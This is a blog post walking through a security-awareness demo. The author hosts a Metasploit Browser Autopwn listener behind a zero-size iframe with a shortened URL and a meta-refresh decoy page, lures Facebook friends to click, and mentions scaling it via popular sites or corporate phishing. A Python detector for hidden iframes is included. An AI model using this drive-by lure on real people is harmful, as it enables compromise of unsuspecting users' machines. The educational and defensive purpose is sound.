Recipe for disaster – One Metasploit, One Facebook, a dash of iframes and a sprinkle of Social Engineering

I wanted to make a point to someone and show how easy it is to get hacked…
This is how it started, so let me give you a brief rundown of it.


So in general when you’re on Facebook, you see an article about something, you click on the link and don’t think twice about it. But it’s that simple to get hacked.

You have no idea until it’s too late what that site can do. So to prove this point, I set up a little experiment.

So I fired up Kali Linux and got my Metasploit on.

I set up a Metasploit listener using Armitage, set the payload to Browser Autopwn, then set about the rest of the steps needed.

Then we wait for a minute while Metasploit sets up the listener.

[Screenshot]

We now have a link ready for us to use, as you can see in the screenshot above.

So we go to our favorite web hosting provider and make a simple .html file, in this case surprise.html.

Open it up and let’s edit the file.

So I made this simple file, let’s walk through it…

The line that says <meta http-equiv="refresh" content="4;url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" />
basically tells the browser to refresh the page in 4 seconds and redirect and load the YouTube site.

<body bgcolor="#000000"> says to make the background black.
<img src=images.jpeg> says to load an image file called images.jpeg (I had already uploaded it earlier, but you can link to any file).
<iframe src="http://tiny.cc/XXXXXXXXXX" height=0 width=0 ></iframe> and this is where the magic happens. This says to create an iframe with a height of 0 and a width of 0. The URL has been shortened using tiny.cc.

So when we look at the site, people will only see the image we put there.
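
A defender-side check for the two markers walked through above, as an added example that is not part of the original post: it scans HTML for iframes that render at zero size or are hidden by attribute or CSS, and for timed meta-refresh redirects. The class name, function names and the sample markup are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample mirroring the page walked through above (iframe URL is the redacted one).
SAMPLE = '''<html><head>
<meta http-equiv="refresh" content="4;url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" />
</head><body bgcolor="#000000">
<img src=images.jpeg>
<iframe src="http://tiny.cc/XXXXXXXXXX" height=0 width=0 ></iframe>
</body></html>'''

HIDING_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
ZERO_CSS = re.compile(r"(?:^|;)\s*(?:width|height)\s*:\s*0(?:px|%|em)?\s*(?:;|$)", re.I)

def _is_zero(value):
    """True for dimension attribute values such as '0', '0px' or '0%'."""
    return value is not None and re.fullmatch(r"\s*0+(?:px|%)?\s*", value) is not None

class HiddenFrameScanner(HTMLParser):
    """Collects iframes a visitor cannot see and timed meta-refresh redirects."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "")
            if (_is_zero(a.get("width")) or _is_zero(a.get("height")) or "hidden" in a
                    or HIDING_CSS.search(style) or ZERO_CSS.search(style)):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content has the form "<seconds>;url=<target>"
            m = re.match(r"\s*(\d+)\s*[;,]\s*url\s*=\s*['\"]?([^'\"]+)",
                         a.get("content", ""), re.I)
            if m:
                self.findings.append(("meta-refresh", m.group(2).strip(), int(m.group(1))))

def scan(html):
    """Return findings in document order for one HTML document."""
    scanner = HiddenFrameScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Findings are triage leads rather than verdicts, since zero-size iframes and meta refreshes also appear in legitimate pages; the combination of an invisible frame pointing at a shortened URL and a quick redirect elsewhere is what deserves a closer look.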


So we now have a Metasploit listener waiting, and we have a website up and ready to spit out our tiny.cc URL and a redirect to make people think the YouTube video was the trick.

One thing we need to do now is port forward to our waiting Metasploit session…

At this point we are ready to roll 😉

So we pop over to our best social networking site and we post a “social experiment” …..


Or we post over a QR code

Then we sit, and we wait and we think, really? Nah, no one will click on it, c’mon, who would….

ah …..

So we see that people actually do click on these links when they have no idea what those links do… ah man.
This is why my InfoSec job is hard work, trying to defend against this. How do we stop people clicking?

Anyways, we pop back over to Facebook and we post an update….

And it’s that simple: you could at this point have a meterpreter shell on 1, 2, 3, 4, 5 people’s boxes… 1000s if you hide this on a large popular website!
What about popping it in a phishing email and sending it to a corporate DL?

This leads us to think about how dangerous iframes can be, how hard it is to defend against social engineering and how important user education is…
This type of education needs to start at the school level… the seed needs to be sowed and lessons need to be taught on security.
In this day and age, security is no longer an afterthought!

Anyways, can you guess what the YouTube video was……

DISCLAIMER: The site I created is now dismantled and was hosted by me on one of my own domains. The people that clicked were my friends and family, not members of the general public, and were spoken to after.